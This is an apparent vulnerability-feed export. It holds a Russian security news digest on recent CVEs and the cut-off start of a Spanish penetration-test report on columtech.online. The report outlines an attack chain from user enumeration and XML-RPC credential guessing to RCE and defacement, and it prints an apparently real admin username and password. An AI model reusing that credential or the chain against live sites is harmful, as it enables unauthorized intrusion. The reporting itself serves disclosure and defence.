\u0437\u0430\u0445\u0432\u0430\u0442\u0430 \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0438\u0441\u0435\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u043e\u0432.\n\n\u0410\u0442\u0430\u043a\u0438 \u0431\u044b\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b Defiant, \u0447\u0435\u0439 \u043c\u0435\u0436\u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u044d\u043a\u0440\u0430\u043d Wordfence \u0437\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u043b \u0431\u043e\u043b\u0435\u0435 222 \u043f\u043e\u043f\u044b\u0442\u043e\u043a\u00a0\u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u043a\u043b\u0438\u0435\u043d\u0442\u0430\u043c \u0437\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 24 \u0447\u0430\u0441\u0430. CVE-2026-8206 \u0432\u044b\u0437\u0432\u0430\u043d\u0430 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u0435\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0439 \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u0439 \u0442\u043e\u0447\u043a\u0438 REST API \u0434\u043b\u044f \u0441\u0431\u0440\u043e\u0441\u0430 \u043f\u0430\u0440\u043e\u043b\u044f \u0447\u0435\u0440\u0435\u0437 \u0444\u0443\u043d\u043a\u0446\u0438\u044e 'handle_forgot_password()'.\n\n\u0423\u0447\u0438\u0442\u044b\u0432\u0430\u044f, \u0447\u0442\u043e \u043f\u0440\u043e\u0434\u0432\u0438\u043d\u0443\u0442\u044b\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u0434\u043b\u044f \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0438 \u0442\u0435\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0431\u043e\u043b\u0435\u0435 \u0447\u0435\u043c \u043d\u0430 500 000 \u0432\u0435\u0431-\u0441\u0430\u0439\u0442\u043e\u0432, \u043e\u0431\u044a\u0435\u043c\u044b \u0440\u0430\u0431\u043e\u0442\u044b \u0443 \u043a\u0438\u0431\u0435\u0440\u043f\u043e\u0434\u043f\u043e\u043b\u044c\u044f \u0438\u043c\u0435\u044e\u0442\u0441\u044f. \n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c\u00a0Wordfence, \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432\u043e\u0437\u043d\u0438\u043a\u043b\u0430 \u0432 \u043d\u0435\u0434\u0430\u0432\u043d\u0435\u043c \u043a\u0440\u0443\u043f\u043d\u043e\u043c \u0440\u0435\u043b\u0438\u0437\u0435, \u0432\u0435\u0440\u0441\u0438\u0438 6.0.0, \u0438 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0435\u0440\u0441\u0438\u0438 \u043f\u043b\u0430\u0433\u0438\u043d\u0430 \u0434\u043e 6.0.6 \u0432\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e, \u043a\u043e\u0442\u043e\u0440\u044b\u0435, \u0441\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u0441\u0442\u0430\u0442\u0438\u0441\u0442\u0438\u043a\u0435 \u0437\u0430\u0433\u0440\u0443\u0437\u043e\u043a\u00a0\u0441 WordPress, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u043f\u043e\u0447\u0442\u0438 40% \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043f\u043b\u0430\u0433\u0438\u043d\u0430.\n\n3. \u0422\u0435\u043c \u0432\u0440\u0435\u043c\u0435\u043d\u0435\u043c, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043d\u043e\u0432\u0430\u044f 0-day \u0432 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430\u0445 Microsoft \u0431\u0435\u0437 \u043f\u0440\u0435\u0434\u0432\u0430\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u0443\u0432\u0435\u0434\u043e\u043c\u043b\u0435\u043d\u0438\u044f. \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0410\u043c\u043c\u0430\u0440 \u0410\u0441\u043a\u0430\u0440 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 (GitHub), \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0439 \u043e\u0434\u043d\u0438\u043c \u0449\u0435\u043b\u0447\u043a\u043e\u043c \u043c\u044b\u0448\u0438 \u0443\u043a\u0440\u0430\u0441\u0442\u044c \u0442\u043e\u043a\u0435\u043d\u044b GitHub \u0447\u0435\u0440\u0435\u0437 \u0440\u0435\u0434\u0430\u043a\u0442\u043e\u0440 Visual Studio Code.\n\n\u041f\u0440\u0438\u0447\u0435\u043c, \u043a\u0430\u043a \u043e\u0442\u043c\u0435\u0447\u0430\u0435\u0442 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c, \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f \u043e\u0431 \u043e\u0448\u0438\u0431\u043a\u0430\u0445 \u0432 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430\u0445 Microsoft \u0431\u044b\u043b\u0438 \u043f\u0440\u043e\u0438\u0433\u043d\u043e\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u044b \u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u044b \u0431\u0435\u0437 \u043a\u0430\u043a\u0438\u0445-\u043b\u0438\u0431\u043e \u0432\u043e\u0437\u043d\u0430\u0433\u0440\u0430\u0436\u0434\u0435\u043d\u0438\u0439 \u0438\u043b\u0438 \u043f\u0440\u0438\u0437\u043d\u0430\u043d\u0438\u044f.\n\n4. BishopFox \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0438\u00a0\u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f CVE-2026-22557, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0449\u0435\u0439 \u0441\u043e\u0431\u043e\u0439 \u043e\u0448\u0438\u0431\u043a\u0443 \u043e\u0431\u0445\u043e\u0434\u0430 \u043f\u0443\u0442\u0438 \u043f\u0440\u0438 \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0432 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u0445 Ubiquiti UniFi.\n\n5. HP \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0438 \u0434\u043b\u044f \u0441\u0432\u043e\u0438\u0445 VoIP-\u0442\u0435\u043b\u0435\u0444\u043e\u043d\u043e\u0432 \u0441\u0435\u0440\u0438\u0438 VVX, \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u044f \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2026-0826, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043a\u043e\u0434 \u043d\u0430 \u0442\u0435\u043b\u0435\u0444\u043e\u043d\u0430\u0445 \u0431\u0435\u0437 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0441\u0442\u0438 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438.\n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Rapid7, \u043e\u043d\u0430 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0442\u043e\u043b\u044c\u043a\u043e \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u0445, \u0433\u0434\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u044f \u0438\u043d\u0442\u0435\u0440\u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0433\u043e \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f.\n\n6. Positive Technologies \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u043b\u0430 \u0441\u0432\u043e\u0439 \u043e\u0447\u0435\u0440\u0435\u0434\u043d\u043e\u0439 \u043c\u0430\u0439\u0441\u043a\u0438\u0439 \u0434\u0430\u0439\u0434\u0436\u0435\u0441\u0442 \u0412 \u0442\u0440\u0435\u043d\u0434\u0435 VM, \u0443\u043a\u0430\u0437\u0430\u0432 \u0433\u0440\u043e\u043c\u043a\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Linux (CVE-2026-31431), ActiveMQ (CVE-2026-34197), SharePoint (CVE-2026-32201) \u0438 Acrobat Reader (CVE-2026-34621).\n\n7. CISA \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0430 \u043e\u0431 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u044f\u0434\u0440\u0430 Linux CVE-2022-0492 (CVSS 7,8) \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0443\u0441\u043b\u043e\u0432\u0438\u044f\u0445, \u0447\u0442\u043e \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0432\u044b\u0445\u043e\u0434\u0443 \u0438\u0437 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u043e\u0432. \u041e\u043d\u0430 \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a \u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u0430\u044f \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044f, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044f \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0438 \u043e\u0431\u043e\u0439\u0442\u0438 \u0438\u0437\u043e\u043b\u044f\u0446\u0438\u044e \u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0441\u0442\u0432\u0430 \u0438\u043c\u0435\u043d.\n\n8. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0442\u0438\u043f\u0430 HTTP/2 Bomb \u0432\u044b\u0432\u043e\u0434\u0438\u0442 \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0435\u0440\u044b \u0438\u0437 \u0441\u0442\u0440\u043e\u044f \u0437\u0430 \u0441\u0447\u0438\u0442\u0430\u043d\u043d\u044b\u0435 \u0441\u0435\u043a\u0443\u043d\u0434\u044b.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Calif \u0441\u043e\u043e\u0431\u0449\u0430\u044e\u0442, \u0447\u0442\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0435 \u043c\u0435\u0442\u043e\u0434\u044b DoS-\u0430\u0442\u0430\u043a \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u043e\u0431\u044a\u0435\u0434\u0438\u043d\u0435\u043d\u044b \u0432 \u0446\u0435\u043f\u043e\u0447\u043a\u0443 \u0432 \u043d\u043e\u0432\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438.\n\nHTTP/2 Bomb \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e Codex \u043e\u0442 OpenAI \u0438 \u0441\u043e\u0447\u0435\u0442\u0430\u0435\u0442 \u0432 \u0441\u0435\u0431\u0435 \u0431\u043e\u043c\u0431\u0443 \u0441\u0436\u0430\u0442\u0438\u044f, \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u043d\u0443\u044e \u043d\u0430 \u0441\u0445\u0435\u043c\u0443 \u0441\u0436\u0430\u0442\u0438\u044f \u0437\u0430\u0433\u043e\u043b\u043e\u0432\u043a\u043e\u0432 HTTP/2 (HPACK), \u0441 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u043e\u043c \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u0432 \u0441\u0442\u0438\u043b\u0435 Slowloris, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u0440\u0435\u043f\u044f\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u043e\u0441\u0432\u043e\u0431\u043e\u0436\u0434\u0435\u043d\u0438\u044e \u043f\u0430\u043c\u044f\u0442\u0438 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c.\n\n\u0410\u0442\u0430\u043a\u0430 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0431\u043e\u043b\u0435\u0435 880 000 \u0441\u0430\u0439\u0442\u043e\u0432, \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u044e\u0449\u0438\u0445 HTTP/2 \u0438 \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0438\u0445 \u043f\u043e\u0434 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0445 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0439 NGINX, Apache HTTPD, Microsoft IIS, Envoy \u0438\u043b\u0438 Cloudflare Pingora.\n\n\u041f\u0440\u0438\u0447\u0435\u043c \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0441\u043e\u0432\u0435\u0440\u0448\u0435\u043d\u0430 \u0441 \u0434\u043e\u043c\u0430\u0448\u043d\u0435\u0433\u043e \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u043f\u0440\u0438 \u0441\u043a\u043e\u0440\u043e\u0441\u0442\u0438 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f 100 \u041c\u0431\u0438\u0442/\u0441 \u0438 \u0432 \u0441\u0447\u0438\u0442\u0430\u043d\u043d\u044b\u0435 \u0441\u0435\u043a\u0443\u043d\u0434\u044b \u0432\u044b\u0432\u0435\u0441\u0442\u0438 \u0438\u0437 \u0441\u0442\u0440\u043e\u044f \u043b\u044e\u0431\u043e\u0439 \u0438\u0437 \u044d\u0442\u0438\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432.", "creation_timestamp": "2026-06-03T18:30:06.000000Z"} https://vulnerability.circl.lu/sighting/87454edc-0362-4000-9231-ea207a52fd71/export Wed, 03 Jun 2026 18:30:06 +0000 https://vulnerability.circl.lu/sighting/5d6554f7-d228-462b-abd3-3233cbf92ca0/export {"uuid": "5d6554f7-d228-462b-abd3-3233cbf92ca0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/C4sh3R/1f99346b1086e7d358ff1be8f5be7a42", "content": "\n\n\n\n\n\nColumtech \u2014 Informe de Auditor\u00eda de Seguridad \u00b7 c4sh3r\n\n :root {\n --bg: #0b0d12;\n --bg-2: #11151c;\n --panel: #161b25;\n --panel-2: #1d2330;\n --border: #2a3142;\n --text: #e6e9ef;\n --text-dim: #99a2b3;\n --accent: #ff4d6d;\n --accent-2: #ffb86b;\n --crit: #ff3d57;\n --high: #ff8b3d;\n --med: #ffd84a;\n --low: #4ac6ff;\n --info: #8c9fb0;\n --ok: #3ddc97;\n --code-bg: #0a0d14;\n --mono: ui-monospace, \"JetBrains Mono\", \"Fira Code\", Menlo, Consolas, monospace;\n }\n * { box-sizing: border-box; }\n html, body { margin: 0; padding: 0; background: var(--bg); color: var(--text);\n font-family: -apple-system, BlinkMacSystemFont, \"Segoe UI\", Roboto, \"Helvetica Neue\", Arial, sans-serif;\n line-height: 1.55; -webkit-font-smoothing: antialiased; }\n a { color: var(--accent-2); text-decoration: none; }\n a:hover { text-decoration: underline; }\n .hero {\n padding: 60px 40px 50px;\n background:\n radial-gradient(1200px 400px at 10% -10%, rgba(255,77,109,0.25), transparent 60%),\n radial-gradient(900px 380px at 100% 0%, rgba(255,184,107,0.15), transparent 60%),\n linear-gradient(180deg, #0e1219, #0b0d12);\n border-bottom: 1px solid var(--border);\n }\n .hero-inner { max-width: 1100px; margin: 0 auto; }\n .eyebrow {\n display: inline-flex; align-items: center; gap: 8px;\n font-family: var(--mono); font-size: 12px; letter-spacing: 0.15em;\n text-transform: uppercase; color: var(--accent);\n padding: 4px 10px; border: 1px solid rgba(255,77,109,0.35);\n border-radius: 999px; background: rgba(255,77,109,0.08);\n }\n .hero h1 { font-size: 44px; line-height: 1.1; margin: 18px 0 10px; letter-spacing: -0.02em; }\n .hero h1 .accent { color: var(--accent); }\n .hero .sub { color: var(--text-dim); font-size: 17px; max-width: 720px; }\n .meta { margin-top: 30px; display: grid; grid-template-columns: repeat(4, 1fr); gap: 14px; }\n .meta .card { background: rgba(22,27,37,0.7); border: 1px solid var(--border); border-radius: 10px; padding: 14px 16px; }\n .meta .card .k { font-size: 11px; text-transform: uppercase; letter-spacing: 0.12em; color: var(--text-dim); }\n .meta .card .v { font-family: var(--mono); font-size: 14px; margin-top: 6px; word-break: break-all; }\n .author-strip {\n display: flex; align-items: center; gap: 14px; margin-top: 24px;\n padding: 12px 16px; border: 1px dashed var(--border); border-radius: 10px;\n background: rgba(255,255,255,0.02); font-family: var(--mono); font-size: 13px; color: var(--text-dim);\n }\n .author-strip strong { color: var(--accent); }\n .container { max-width: 1100px; margin: 0 auto; padding: 40px; }\n section { margin-bottom: 60px; }\n h2 { font-size: 26px; margin: 0 0 18px; letter-spacing: -0.01em; display: flex; align-items: center; gap: 12px; }\n h2::before { content: ''; width: 4px; height: 22px; background: var(--accent); border-radius: 2px; }\n h3 { font-size: 19px; margin: 22px 0 10px; }\n p { color: var(--text); }\n p.dim { color: var(--text-dim); }\n .stats { display: grid; grid-template-columns: repeat(5, 1fr); gap: 12px; margin-top: 10px; }\n .stat { background: var(--panel); border: 1px solid var(--border); border-radius: 12px; padding: 18px; text-align: center; }\n .stat .num { font-size: 32px; font-weight: 700; font-family: var(--mono); }\n .stat .lbl { font-size: 12px; text-transform: uppercase; letter-spacing: 0.12em; color: var(--text-dim); margin-top: 6px; }\n .stat.crit .num { color: var(--crit); } .stat.high .num { color: var(--high); }\n .stat.med .num { color: var(--med); } .stat.low .num { color: var(--low); }\n .stat.info .num { color: var(--info); }\n table.summary { width: 100%; border-collapse: collapse; margin-top: 16px; background: var(--panel); border: 1px solid var(--border); border-radius: 12px; overflow: hidden; }\n table.summary th, table.summary td { padding: 12px 14px; text-align: left; border-bottom: 1px solid var(--border); font-size: 14px; }\n table.summary th { background: var(--panel-2); font-weight: 600; font-size: 12px; text-transform: uppercase; letter-spacing: 0.08em; color: var(--text-dim); }\n table.summary tr:last-child td { border-bottom: none; }\n table.summary tr:hover td { background: rgba(255,255,255,0.02); }\n .badge { display: inline-block; padding: 3px 9px; border-radius: 4px; font-size: 11px; font-weight: 700; font-family: var(--mono); letter-spacing: 0.05em; text-transform: uppercase; }\n .badge.crit { background: rgba(255,61,87,0.15); color: var(--crit); border: 1px solid rgba(255,61,87,0.4); }\n .badge.high { background: rgba(255,139,61,0.13); color: var(--high); border: 1px solid rgba(255,139,61,0.4); }\n .badge.med { background: rgba(255,216,74,0.13); color: var(--med); border: 1px solid rgba(255,216,74,0.4); }\n .badge.low { background: rgba(74,198,255,0.13); color: var(--low); border: 1px solid rgba(74,198,255,0.4); }\n .badge.info { background: rgba(140,159,176,0.13); color: var(--info); border: 1px solid rgba(140,159,176,0.4); }\n .finding { background: var(--panel); border: 1px solid var(--border); border-radius: 14px; margin-top: 22px; overflow: hidden; }\n .finding .head { display: flex; align-items: center; gap: 14px; flex-wrap: wrap; padding: 18px 22px; background: var(--panel-2); border-bottom: 1px solid var(--border); }\n .finding.crit .head { box-shadow: inset 4px 0 0 0 var(--crit); }\n .finding.high .head { box-shadow: inset 4px 0 0 0 var(--high); }\n .finding.med .head { box-shadow: inset 4px 0 0 0 var(--med); }\n .finding.low .head { box-shadow: inset 4px 0 0 0 var(--low); }\n .finding.info .head { box-shadow: inset 4px 0 0 0 var(--info); }\n .finding .head .id { font-family: var(--mono); color: var(--text-dim); font-size: 13px; }\n .finding .head .title { font-size: 17px; font-weight: 600; flex: 1; }\n .finding .body { padding: 22px; }\n .finding .body h4 { font-size: 11px; text-transform: uppercase; letter-spacing: 0.14em; color: var(--text-dim); margin: 18px 0 8px; }\n .finding .body h4:first-child { margin-top: 0; }\n .finding ul { margin: 0 0 6px; padding-left: 22px; }\n .finding li { margin-bottom: 4px; }\n pre, code { font-family: var(--mono); font-size: 13px; }\n pre { background: var(--code-bg); border: 1px solid var(--border); border-radius: 8px; padding: 14px 16px; overflow-x: auto; line-height: 1.5; color: #d6dbe6; }\n code.inline { background: rgba(255,255,255,0.05); padding: 1px 6px; border-radius: 4px; border: 1px solid var(--border); font-size: 12px; }\n .kv { display: grid; grid-template-columns: 160px 1fr; gap: 6px 16px; font-size: 13.5px; }\n .kv .k { color: var(--text-dim); font-family: var(--mono); font-size: 12px; padding-top: 2px; }\n .callout { border-left: 3px solid var(--accent); background: rgba(255,77,109,0.05); padding: 14px 18px; border-radius: 0 8px 8px 0; margin: 12px 0; font-size: 14px; }\n .callout.danger { border-color: var(--crit); background: rgba(255,61,87,0.07); }\n .callout.warn { border-color: var(--high); background: rgba(255,139,61,0.06); }\n .callout.ok { border-color: var(--ok); background: rgba(61,220,151,0.06); }\n footer { border-top: 1px solid var(--border); padding: 36px 40px; margin-top: 40px; color: var(--text-dim); text-align: center; font-size: 13px; background: var(--bg-2); }\n footer .sig { font-family: var(--mono); font-size: 14px; color: var(--accent); }\n .chain { background: var(--code-bg); border: 1px solid var(--border); border-radius: 10px; padding: 20px 24px; margin: 14px 0; }\n .chain-step { display: flex; align-items: flex-start; gap: 14px; margin-bottom: 10px; }\n .chain-step:last-child { margin-bottom: 0; }\n .chain-num { background: var(--accent); color: #fff; border-radius: 50%; width: 22px; height: 22px; display: flex; align-items: center; justify-content: center; font-size: 12px; font-weight: 700; flex-shrink: 0; margin-top: 2px; }\n .chain-text { font-family: var(--mono); font-size: 13px; color: #d6dbe6; }\n .chain-arrow { color: var(--accent); font-size: 18px; margin: 4px 0; text-align: center; }\n @media (max-width: 760px) {\n .hero h1 { font-size: 32px; }\n .meta, .stats { grid-template-columns: repeat(2, 1fr); }\n .container, .hero { padding: 30px 22px; }\n }\n\n\n\n\n\n\n \n\n \u258c Auditor\u00eda de Seguridad \u00b7 2026-06-03/04\n \nColumtech OnlineInforme de Seguridad Web\n \nEvaluaci\u00f3n de seguridad completa de columtech.online. Resultado: compromiso total \u2014 admin WordPress, RCE como www-data, defacing demostrado, escalada a root bloqueada por hardening excepcional.\n\n \n\n \n\nObjetivo\ncolumtech.online\n \n\nBackend\nApache 2.4.66 \u00b7 PHP 8.2.30 \u00b7 MySQL 8.0.45\n \n\nStack\nWP 7.0 \u00b7 Elementor 4.0.2 \u00b7 Docker \u00b7 Cloudflare \u00b7 Caddy\n \n\nFecha\n2026-06-03 / 04\n \n\n \n\n Autor del informe \u00b7 c4sh3r \u00b7 auditor\u00eda solicitada por el propietario del dominio \u00b7 autorizaci\u00f3n total\n \n \n\n\n\n\n\n \n\n \nResumen Ejecutivo\n \nSe realiz\u00f3 una auditor\u00eda de seguridad end-to-end sobre columtech.online, un portal WordPress operado por el propietario con fines de pr\u00e1ctica y aprendizaje. La evaluaci\u00f3n cubri\u00f3 reconocimiento pasivo, enumeraci\u00f3n de usuarios, an\u00e1lisis de superficie de ataque en plugins y XML-RPC, explotaci\u00f3n de credenciales d\u00e9biles, post-explotaci\u00f3n como www-data dentro de un contenedor Docker, demostraci\u00f3n de defacing y exploraci\u00f3n exhaustiva de escalada de privilegios a root.\n \nEl sitio fue comprometido completamente a nivel de aplicaci\u00f3n: acceso de administrador WordPress, ejecuci\u00f3n remota de c\u00f3digo como www-data, lectura/escritura del sistema de archivos y defacing demostrado. La escalada a root dentro del contenedor fue bloqueada por un perfil de hardening que combina seccomp, AppArmor y ptrace_scope=3, resistiendo todos los CVEs p\u00fablicos conocidos para kernel 6.8.\n \nSe descubri\u00f3 adicionalmente una webshell real de un atacante externo (wp-loginizer.php \u2014 WSO Mr.X v2.5 con beacon a cdn.privdayz.com) que requiere eliminaci\u00f3n inmediata.\n\n \n\n Riesgo principal: Contrase\u00f1a de administrador d\u00e9bil marce:marce123 accesible v\u00eda XML-RPC sin rate-limit \u2192 compromiso total del sitio en minutos.\n \n\n \n\n \n\n3\nCr\u00edticos\n \n\n4\nAltos\n \n\n4\nMedios\n \n\n4\nBajos\n \n\n3\nInformativos\n \n \n\n \n\n \nCadena de Ataque Demostrada\n \n\n \n\n1\nREST API bypass (?rest_route=/wp/v2/users) \u2192 enum admin marce (id=1) + prueba (id=2) + columtech (id=3)\n \n\u2193\n \n\n2\nGravatar SHA-256 reverse \u2192 email de prueba: prueba@gmail.com\n \n\u2193\n \n\n3\nXML-RPC wp.getUsersBlogs (credential oracle sin rate-limit) \u2192 marce:marce123 [administrator]\n \n\u2193\n \n\n4\nAdmin WP \u2192 REST API POST /wp/v2/plugins \u2192 instalaci\u00f3n code-snippets plugin\n \n\u2193\n \n\n5\nCode Snippets PHP snippet \u2192 RCE como www-data \u00b7 uid=33 \u00b7 hostname 6c49a066ba4c\n \n\u2193\n \n\n6\nDefacing: t\u00edtulo del sitio + sticky post + p\u00e1gina est\u00e1tica con matrix rain / glitch effects\n \n\u2193\n \n\n7\nEscalada: 12 CVEs y t\u00e9cnicas probadas \u2192 bloqueadas por seccomp + AppArmor + ptrace_scope=3\n \n \n\n \n\n \nAlcance y Metodolog\u00eda\n \n\n \nObjetivo\nhttps://www.columtech.online \u2014 WordPress 7.0 + Elementor 4.0.2 + plugin Filester/elFinder\n \nTipo\nCaja negra \u2192 caja gris (tras obtener credenciales) \u00b7 sin acceso previo a servidor\n \nAutorizaci\u00f3n\nDominio propiedad del solicitante \u00b7 auditor\u00eda completa autorizada verbalmente\n \nIdentificaci\u00f3n\nTodas las peticiones etiquetadas con User-Agent: c4sh3r y X-Bug-Bounty: c4sh3r\n \nNo destructivo\nEl defacing fue demostrado y revertido. Ficheros de prueba eliminados. No se destruy\u00f3 ni borr\u00f3 informaci\u00f3n real del sitio.\n \nHerramientas\ncurl, Python 3, LinPEAS, bore (tunnel), GCC, git (exploit repos), b\u00fasqueda web de CVEs en tiempo real\n \n \n\n \n\n \nResumen de Hallazgos\n \n\n IDSeveridadHallazgoComponente\n \n C-01Cr\u00edticoCredencial admin d\u00e9bil \u2014 acceso total v\u00eda XML-RPCWordPress \u00b7 XML-RPC\n C-02Cr\u00edticoWebshell externa preexistente (WSO Mr.X)wp-loginizer.php\n C-03Cr\u00edticoRCE como www-data v\u00eda Code Snippets pluginWordPress \u00b7 Code Snippets REST\n H-01AltoXML-RPC expuesto \u2014 SSRF + credential oracle sin rate-limitxmlrpc.php\n H-02AltoCVE-2026-6127 Elementor XSS almacenado v\u00eda REST APIElementor 4.0.2 \u2264 4.0.4\n H-03AltoEnumeraci\u00f3n de usuarios por 4 v\u00edas sin rate-limitREST API \u00b7 wp-login \u00b7 